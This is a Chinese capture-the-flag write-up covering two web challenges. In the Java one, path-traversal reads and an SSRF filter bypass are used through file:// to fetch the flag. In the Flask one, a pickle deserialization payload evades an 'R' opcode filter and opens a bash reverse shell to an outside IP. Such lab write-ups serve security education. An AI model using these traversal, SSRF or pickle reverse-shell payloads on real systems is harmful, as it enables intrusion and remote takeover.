CTF长城杯 ·部分writeup

admin 2021年10月9日17:37:45CTF长城杯 ·部分writeup已关闭评论412 views字数 6243阅读20分48秒阅读模式

java_url

hint

/download?filename=/upload/xxx.jpg

读passwd进行测试,可读

/download?filename=../../../../../../../../../etc/passwd

尝试读flag,发现被过滤

/testURL?url=http://127.0.0.1/download?filename=../../../../../../../../../flag

读配置文件,发现java类

/download?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml

读类源码

/download?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/com/test2/aaa1/download.class

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>testurl</servlet-name>
        <servlet-class>com.test2.aaa1.testURL</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>testurl</servlet-name>
        <url-pattern>/testURL</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>download</servlet-name>
        <servlet-class>com.test2.aaa1.download</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>download</servlet-name>
        <url-pattern>/download</url-pattern>
    </servlet-mapping>
</web-app>

java支持协议:

  • file
  • http
  • https
  • ftp
  • netdoc
  • gopher

download.class

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package com.test2.aaa1;

import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.URLEncoder;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class download extends HttpServlet {
    private static final long serialVersionUID = 1L;

    public download() {
    }

    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        this.doPost(request, response);
    }

    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        String fileName = request.getParameter("filename");
        if (fileName.contains("environ")) {
            response.getWriter().write("false");
        } else {
            fileName = new String(fileName.getBytes("ISO8859-1"), "UTF-8");
            System.out.println("filename=" + fileName);
            if (fileName != null && fileName.toLowerCase().contains("flag")) {
                request.setAttribute("message", "no no no ");
                request.getRequestDispatcher("/message2.jsp").forward(request, response);
            } else {
                String fileSaveRootPath = this.getServletContext().getRealPath("/WEB-INF/upload");
                String path = this.findFileSavePathByFileName(fileName, fileSaveRootPath);
                File file = new File(path + "/" + fileName);
                if (!file.exists()) {
                    request.setAttribute("message", "error");
                    request.getRequestDispatcher("/message2.jsp").forward(request, response);
                } else {
                    String realname = fileName.substring(fileName.indexOf("_") + 1);
                    response.setHeader("content-disposition", "attachment;filename=" + URLEncoder.encode(realname, "UTF-8"));
                    FileInputStream in = new FileInputStream(path + "/" + fileName);
                    ServletOutputStream out = response.getOutputStream();
                    byte[] buffer = new byte[1024];
                    boolean var11 = false;

                    int len;
                    while((len = in.read(buffer)) > 0) {
                        out.write(buffer, 0, len);
                    }

                    in.close();
                    out.close();
                }
            }
        }

    }

    public String findFileSavePathByFileName(String filename, String saveRootPath) {
        int hashCode = filename.hashCode();
        int dir1 = hashCode & 15;
        int dir2 = (hashCode & 240) >> 4;
        String dir = saveRootPath + "/" + dir1 + "/" + dir2;
        File file = new File(dir);
        if (!file.exists()) {
            file.mkdirs();
        }

        return dir;
    }
}

testURL.class

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package com.test2.aaa1;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class testURL extends HttpServlet {
    public testURL() {
    }

    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        this.doPost(req, resp);
    }

    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        String tartget_url = req.getParameter("url");
        String pri = tartget_url.substring(0, tartget_url.indexOf(":"));
        if (pri.matches("(?i)file|(?i)gopher|(?i)data")) {
            resp.getWriter().write(String.valueOf((new StringBuilder()).append("false")));
        } else {
            resp.getWriter().write(String.valueOf(this.getContent(tartget_url)));
        }

    }

    public StringBuilder getContent(String url) throws IOException {
        URL urL = new URL(url);
        URLConnection con = urL.openConnection();
        BufferedReader in = new BufferedReader(new InputStreamReader(con.getInputStream()));
        StringBuilder content = new StringBuilder();

        String inputLine;
        while((inputLine = in.readLine()) != null) {
            content.append(inputLine);
            content.append("n");
        }

        return content;
    }
}

payload:

url:file:///flag

ez_python

<!-- ?pic=1.jpg -->

base64解码读源码,得app.py

import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file

app = Flask(__name__)

class User():
    def __init__(self,name,age):
        self.name = name
        self.age = age

def check(s):
    if b'R' in s:
        return 0
    return 1


@app.route("/")
def index():
    try:
        user = base64.b64decode(request.cookies.get('user'))
        if check(user):
            user = pickle.loads(user)
            username = user["username"]
        else:
            username = "bad,bad,hacker"
    except:
        username = "CTFer"
    pic = '{0}.jpg'.format(random.randint(1,7))

    try:
        pic=request.args.get('pic')
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()
    except:
        pic='{0}.jpg'.format(random.randint(1,7))
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()

    return render_template('index.html', uname=username, pic=p )


if __name__ == "__main__":
    app.run('0.0.0.0',port=8888)
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welecom to C4T's page!</title>
</head>
<body>
    hello, , Welecom to my page!!!<br/>
    <img src="data:image/jpg;base64,"/>
    <!--    ?pic=1.jpg   -->
</body>
</html>

参考链接:https://zhuanlan.zhihu.com/p/361349643

import base64
data=b'''(cos
system
S'bash -c "bash -i >& /dev/tcp/175.24.73.30/2333 0>&1"'
o.'''
print(base64.b64encode(data))

results matching ""

    No results matching ""

    相关推荐: 重温 2021 虎符杯 CTF Internal System

    前言解题JS 弱类型登录绕过SSRF 拿到 HintNodeJS 8 HTTP 拆分实现的 SSRF 攻击开始攻击Ending......前言前段时间让炒币弄的没心思学习,现在全赔光了,终于可以安下心了好好学学习了……今天复现了前段时间虎符杯中 "Intern…

    • 左青龙
    • 微信扫一扫
    • weinxin
    • 右白虎
    • 微信扫一扫
    • weinxin
    admin
    • 本文由 发表于 2021年10月9日17:37:45
    • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                     CTF长城杯 ·部分writeuphttp://cn-sec.com/archives/574988.html